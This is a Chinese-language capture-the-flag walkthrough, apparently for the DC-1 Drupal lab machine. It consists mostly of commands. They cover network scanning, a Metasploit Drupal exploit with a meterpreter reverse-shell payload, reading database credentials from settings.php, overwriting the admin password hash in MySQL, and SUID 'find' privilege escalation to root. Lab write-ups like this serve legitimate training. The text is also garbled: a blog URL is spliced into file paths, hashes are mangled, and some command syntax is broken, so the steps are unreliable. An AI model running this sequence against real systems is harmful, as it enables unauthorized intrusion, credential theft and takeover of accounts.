<p>arp-scan -l 扫描当前局域网对应主机的ip<br /> 扫描目标机端口<br /> nmap -p- 目标机ip </p>
讯享网
dirb http://192.168.176.133/ 扫描目录
whatweb -v http://192.168.176.133/ 扫描网站获取信息
进入 msfconsole模式
search Drupal 搜索Drupal
use 1
options
设置payload set payload payload/php/meterpreter/reverse_tcp
设置rhosts set rhosts 192.168.176.133
运行 run
获取网站信息 sysinfo
进入内部命令行窗口 shell
查看文件信息 ls
python -c “import pty;pty.spawn(‘/bin/bash’)”
ls 查看文件列表
查看 flag1.txt文件信息 cat flag1.txt
找到以set开头的文件 find . -name “set*”
查看 cat https://blog.csdn.net/2302_/article/details/sites/default/settings.php
表的信息:
‘database’ => ‘drupaldb’,
‘username’ => ‘dbuser’,
‘password’ => ‘R0ck3t’,
mysql -udbuser -pR0ck3t
注意进入到mysql中语句要加分号;
use drupaldb;
show tables;
select * from users; 筛选信息
select * from usersG; 格式化筛选显示信息
exit; 回车退出mysql
user1 的password,需要解密
\(S\)DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
find . -name “hash”
cat https://blog.csdn.net/2302_/article/details/scripts/password-hash.sh
https://blog.csdn.net/2302_/article/details/scripts/password-hash.sh
复制新生成的密码 \(S\)DnfIwqvAXhTyeFWqddJWoF1OGAFBMr/wBKmJwhmeVK2ry/yz81Km;
mysql -udbuser -pR0ck3t
use drupaldb;
重置密码:
update users set pass=‘\(S\)DnfIwqvAXhTyeFWqddJWoF1OGAFBMr/wBKmJwhmeVK2ry/yz81Km’ where name =‘admin’;
进入网址导航第一个菜单,找flag3
exit;退出mysql
cat /etc/passwd 找到flag4.txt
cd /home/flag4
ls
cat flag4.txt 查看flag4.txt发现需要提权
find / -perm -u=s type f 2>/dev/null
find / -exec “/bin/bash” -p ;
提权后 再次查看 cat flag4.txt

找到最后一个个flag
cd /root
ls
cat thefinalflag.txt
提权
whoami 显示当前正在操作系统的用户
cd /root
ls
cat thefinalflag.txt
\(S\)Do90UV/nlZ5b1q/7r3DqzZ.XZ8HZiRnHGtmrbgIP6uu/RRugUigk
\(S\)D9SkAVzMFyQWBWiswAaKXLr/hDPOs6kLlTEt26FeFtJv5ILIoZNh
123云盘

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/181042.html